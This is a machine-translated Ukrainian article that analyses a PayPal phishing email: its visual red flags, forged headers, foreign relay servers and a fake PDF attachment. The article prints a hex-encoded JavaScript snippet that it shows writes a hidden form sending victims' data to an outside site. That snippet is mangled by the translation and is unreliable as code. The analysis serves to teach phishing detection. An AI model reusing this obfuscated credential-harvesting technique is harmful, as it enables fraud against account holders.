Домашня » як » Інтернет-безпеки порушення анатомії фішингової електронної пошти

    Інтернет-безпеки порушення анатомії фішингової електронної пошти


    У сучасному світі, де інформація кожного доступна в Інтернеті, фішинг є однією з найпопулярніших і руйнівних онлайнових атак, тому що ви завжди можете очистити вірус, але якщо ваші банківські реквізити викрадені, у вас виникли проблеми. Ось розбивка однієї такої атаки, яку ми отримали.

    Не думайте, що важливі лише ваші банківські реквізити: врешті-решт, якщо хтось отримує контроль над входом вашого облікового запису, вони не тільки знають інформацію, що міститься в цьому обліковому записі, але ймовірність того, що таку ж реєстраційну інформацію можна використовувати для інших рахунків. Якщо вони порушують ваш обліковий запис електронної пошти, вони можуть скинути всі інші паролі.

    Таким чином, на додаток до збереження сильних і змінних паролів, ви завжди повинні знаходитися в пошуках фіктивних листів, які маскуються як справжні речі. Хоча більшість спроб фішингу є аматорськими, деякі з них досить переконливі, тому важливо зрозуміти, як розпізнати їх на поверхневому рівні, а також як вони працюють під капотом..

    Зображення asirap

    Дослідження Що таке в простому погляді

    Наші приклади електронної пошти, як і більшість спроб фішингу, "сповіщають" вас про діяльність на вашому обліковому записі PayPal, який за нормальних обставин буде тривожним. Таким чином, заклик до дії - це перевірка / відновлення облікового запису, подавши майже кожну частину особистої інформації, яку ви можете придумати. Знову ж таки, це досить формулично.

    Хоча, безумовно, є винятки, майже кожна фішингова та шахрайська електронна пошта завантажується червоними прапорами безпосередньо в самому повідомленні. Навіть якщо текст є переконливим, зазвичай можна знайти багато помилок, що виникли в тілі повідомлення, що вказує на те, що повідомлення не є законним.

    Тіло повідомлення

    На перший погляд, це одна з кращих фішингових листів, які я бачив. Немає жодних орфографічних або граматичних помилок, а слово «словослів» читається відповідно до того, що можна очікувати. Проте є кілька червоних прапорів, які ви можете побачити, коли ви вивчаєте вміст трохи більш уважно.

    • “Paypal” - Правильний випадок “PayPal” (капітал P). Можна побачити обидві варіанти, які використовуються в повідомленні. Компанії дуже продумані своїми брендами, тому сумнівно, що подібне може пройти процес перевірки.
    • "Дозволити ActiveX" - Скільки разів ви бачили легальний веб-бізнес розміром Paypal, використовуючи власний компонент, який працює тільки на одному браузері, особливо коли вони підтримують кілька браузерів? Звичайно, десь там робиться компанія, але це червоний прапор.
    • - Зверніть увагу на те, як це слово не розташовується в полі з рештою тексту абзацу. Навіть якщо я розтягую вікно трохи більше, він не обертається або простору не правильно.
    • "Paypal!" - Простір перед знаком оклику виглядає незручно. Просто ще одна примха, яку я впевнений, не буде в легальній електронній пошті.
    • "PayPal-Обновлення облікового запису Form.pdf.htm" - Чому б Paypal приєднати "PDF", особливо коли вони могли б просто посилатися на сторінку на своєму сайті? Крім того, чому вони намагаються замаскувати HTML-файл як PDF? Це найбільший червоний прапор усіх.

    Заголовок повідомлення

    Коли ви подивитеся на заголовок повідомлення, з'являються кілька червоних прапорів:

    • З адреси: тест@test.com.
    • Відсутня адреса. Я не відмітив це, це просто не є частиною стандартного заголовка повідомлення. Як правило, компанія, яка має ваше ім'я, персоналізуватиме вам електронну пошту.

    Додаток

    Коли я відкриваю вкладення, ви можете відразу побачити, що макет не є правильним, оскільки в ньому відсутня інформація про стиль. Знову ж таки, чому б PayPal надсилав HTML-форму, коли вони могли просто дати вам посилання на своєму сайті?

    Примітка: Для цього було використано вбудований у переглядачі HTML вкладення Gmail, але ми рекомендуємо вам не відкривати вкладення від шахраїв. Ніколи. Ніколи. Вони дуже часто містять подвиги, які будуть встановлювати трояни на вашому комп'ютері, щоб вкрасти інформацію про ваш обліковий запис.

    Прокручуючи трохи більше, ви бачите, що ця форма вимагає не тільки для реєстраційної інформації PayPal, але й для банківських та кредитних карт. Деякі зображення розбиті.

    Очевидно, що ця спроба фішингу йде після всього одного.

    Технічний злам

    Незважаючи на те, що це має бути досить чітким, виходячи з того, що це зрозуміло, що це спроба фішингу, ми тепер маємо розбити технічний склад електронної пошти і побачити, що ми можемо знайти.

    Інформація з додатку

    Перше, на що слід звернути увагу - це HTML-джерело форми вкладень, яка передає дані на підроблений сайт.

    Коли швидко переглядаєте джерело, всі посилання стають дійсними, оскільки вони вказують на "paypal.com" або "paypalobjects.com", які є обома законними..

    Тепер ми подивимося на деякі основні сторінки, які Firefox збирає на сторінці.

    Як ви можете бачити, деякі графіки витягуються з доменів “blessedtobe.com”, “goodhealthpharmacy.com” та “pic-upload.de” замість легітимних доменів PayPal..

    Інформація з заголовків електронної пошти

    Далі ми розглянемо сирі заголовки повідомлень електронної пошти. Gmail робить це доступним за допомогою пункту меню "Показати оригінал" у повідомленні.

    Дивлячись на інформацію заголовка для початкового повідомлення, ви бачите, що це повідомлення було складено за допомогою Outlook Express 6. Я сумніваюся, що у PayPal є хтось із співробітників, який надсилає кожне з цих повідомлень вручну через застарілий клієнт.

    Розглядаючи інформацію про маршрутизацію, ми можемо побачити IP-адресу відправника та поштового сервера-ретранслятора.

    IP-адреса користувача є оригінальним відправником. Здійснюючи швидкий пошук інформації про ІР, ми бачимо, що IP-адреса відправляється в Німеччині.

    І коли ми дивимося на ретрансляційний поштовий сервер (mail.itak.at), IP-адресу ми бачимо, це провайдер, заснований в Австрії. Я сумніваюся, що PayPal направляє їхні електронні листи безпосередньо через провайдера на основі Австрії, коли вони мають масову серверну ферму, яка може легко вирішити це завдання.

    Куди йдуть дані?

    Тому ми чітко визначили, що це фішинг-лист і зібрали деяку інформацію про те, звідки походить повідомлення, але про те, де відправлено ваші дані?

    Щоб побачити це, ми повинні спочатку зберегти вкладення HTM на наш робочий стіл і відкрити в текстовому редакторі. Прокручуючи його, все виглядає в порядку, за винятком випадків, коли ми переходимо до підозрілого блоку Javascript.

    Видалення повного джерела останнього блоку Javascript, ми бачимо:


    // Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
    вар я, у, х = »3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e»; у = »; для (I = 0; я

    У будь-який час ви бачите величезний рядок з начебто випадкових букв і цифр, вбудованих у блок Javascript, зазвичай це щось підозріле. Дивлячись на код, змінна “x” встановлюється на цю велику рядок і потім декодується в змінну “y”. Остаточний результат змінної «y» записується у документ як HTML.

    Оскільки велика рядок складається з чисел 0-9 і букв a-f, це, швидше за все, кодується через просте перетворення ASCII-Hex:

    3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

    Перекладає на:

    Це не випадково, що це розшифровується у дійсний HTML-тег форми, який посилає результати не до PayPal, а до шахрайського сайту.

    Крім того, коли ви переглядаєте HTML-код форми, ви побачите, що цей тег форми не видно, оскільки він генерується динамічно через Javascript. Це розумний спосіб приховати те, що дійсно робить HTML, якщо хтось просто переглядає згенерований джерело вкладення (як ми це робили раніше), а не відкриття вкладення безпосередньо в текстовому редакторі.

    Запускаючи швидкий whois на сайті-порушнику, ми бачимо, що це домен, розміщений на популярному веб-хості, 1and1.

    Що виділяється, домен використовує читається ім'я (на відміну від щось на кшталт "dfh3sjhskjhw.net") і домен був зареєстрований протягом 4 років. Через це, я вважаю, що цей домен був захоплений і використаний як пішак у цій спробі фішингу.

    Цинізм - хороша оборона

    Коли мова йде про безпеку в Інтернеті, ніколи не завадить мати хороший цинізм.

    Хоча я впевнений, що в наведеному прикладі електронної пошти є більше червоних прапорців, те, що ми вказали вище, є показниками, які ми бачили після кількох хвилин експертизи. Гіпотетично, якщо поверхневий рівень електронної пошти імітував його легальний аналог 100%, технічний аналіз все одно виявить його справжню природу. Ось чому це імпортувати, щоб мати можливість вивчити і те, що ви можете і не можете бачити.